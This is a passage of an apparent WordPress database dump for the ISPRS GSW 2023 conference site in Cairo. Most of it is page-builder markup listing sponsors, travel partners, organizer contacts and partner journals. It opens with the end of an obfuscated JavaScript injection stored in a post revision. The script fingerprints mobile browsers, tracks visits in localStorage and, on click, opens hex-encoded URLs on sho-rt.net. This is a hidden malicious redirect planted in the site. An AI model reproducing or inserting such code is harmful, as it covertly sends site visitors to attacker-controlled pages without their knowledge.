_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-revision-v1','','','2023-08-28 04:57:22','2023-08-28 04:57:22','',5430,'https://gsw2023.com/?p=5436',0,'revision','',0),
(5437,1,'2023-09-16 22:41:12','2023-08-28 04:59:26','','Fun Trips in Cairo','','publish','closed','closed','','fun-trips-in-cairo','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5437',31,'nav_menu_item','',0),
(5438,1,'2023-08-30 17:12:48','2023-08-30 17:12:48','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a 